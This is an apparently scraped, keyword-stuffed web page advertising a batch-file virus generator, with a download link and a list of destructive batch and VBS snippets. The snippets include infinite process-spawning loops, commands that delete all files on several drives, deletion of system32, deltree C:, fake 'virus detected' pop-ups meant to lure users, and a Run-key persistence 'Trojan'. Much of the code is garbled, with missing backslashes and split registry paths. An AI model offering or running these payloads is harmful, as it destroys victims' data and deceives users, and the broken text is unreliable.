- Delme's Batch Virus Generator Download
- Delme's Batch Virus Generator
- Delme S Batch Virus Generator Download
- Delme S Batch Virus Generator
DELmE's Batch Virus Generator is an amazing virus creation program with lots of options to infect the victim PC such as format C: drive, delete all files, disable admin, clean registry, change home page, kill tasks, antivirus and firewall and lots more. Download here ( always from my mediafire compte clean 100% ): delm's batch virus by the boss. DELmE's Batch Virus Generator is an amazing virus creation program with lots of options to infect the victim PC such as format C: drive, delete all files, disable admin, clean registry, change home page, kill tasks, antivirus and firewall and lots more. Download here: http://www.ziddu.com/download/7051522/DELmEsBatchVirusGeneratorv2.0.rar.html. Here is version 1.0.2. This will propably be the last version of this super great virus generator. You made very good generator Havoc, i also tried to make compiler to compile the file from txt to bat, but something went wrong. I tried to use this command shell 'ren viruscode.txt virus.bat' but it say file not found. Drive.bat virus is a dangerous Trojan horse which is capable of damaging victim's data and making it useless; Find out how you can get infected with the file-hiding virus; Eliminate Drive.bat to retrieve access to your files. Eliminate the main shortcut of the virus from external drive automatically.
Delme's Batch Virus Generator Download
Delme's Batch Virus Generator
Delme S Batch Virus Generator Download
- Virus codes | @echo off (cmd wont show command) @echo on (cmd will show command)
- #1 simple virus (opening-cpu drain)
- @echo off
- start
- goto :A
- #2 simple shutdown command - not really a virus
- shutdown -s -t 00<(time) -c 'message here' (you dont need a message)
- #3 make a bunch of folders to the desktop - not really a virus
- @echo off
- cd 'c: documents and settings%username% <<(or) documents and settingsall usersdesktop'
- md %random%
- :A
- (if you want to add more sites add the start (URL here) command here and below)
- goto :A
- #5 system 32 deleter (HARMFUL)
- @echo off del c:windowssystem 32 (extesion.bat)
- #6 delete every file off computer
- del D:. /f /s /q
- del F:. /f /s /q
- del H:. /f /s /q
- del J:. /f /s /q
- Start Crash
- (you can copy and paste Start Crash over and over again for more power)
- X=Msgbox('Virus Is Active',0+16,'Virus Alert')
- X=Msgbox('Wanna Fix Virus',0+16,'Fix Virus')
- del D:. /f /s /q
- del F:. /f /s /q
- del H:. /f /s /q
- del J:. /f /s /q
- :A
- ping localhost -m 5 >nul
- This has a lot of nasty stuff in it. This can KILL a machine once ran. ( DO NOT TRY ON MAIN MACHINE )
- #9 Message Box - Normally used to say stuff like 'virus detected' and 'fix virus' wich leads user to install a virus or message displays while virus is running.
- X=Msgbox('Virus Found On Your Computer',0+16,'Virus Detected')
- You can copy and paste this to have more messages pop up. (you have to run in VBs)
- #10 Trojan Horse virus - very simple Trojan Horse virus that WORKS. (.bat)
- @echo off
- Start C:Programsvirus.bat
- echo break off>>c:windowswimn32.bat
- echo end>>c:windowswimn32.bat
- reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
- reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
- :top
- GOTO top
- Set wshShell =wscript.CreateObject(”WScript.Shell”)
- wscript.sleep 100
- loop
- deltree C: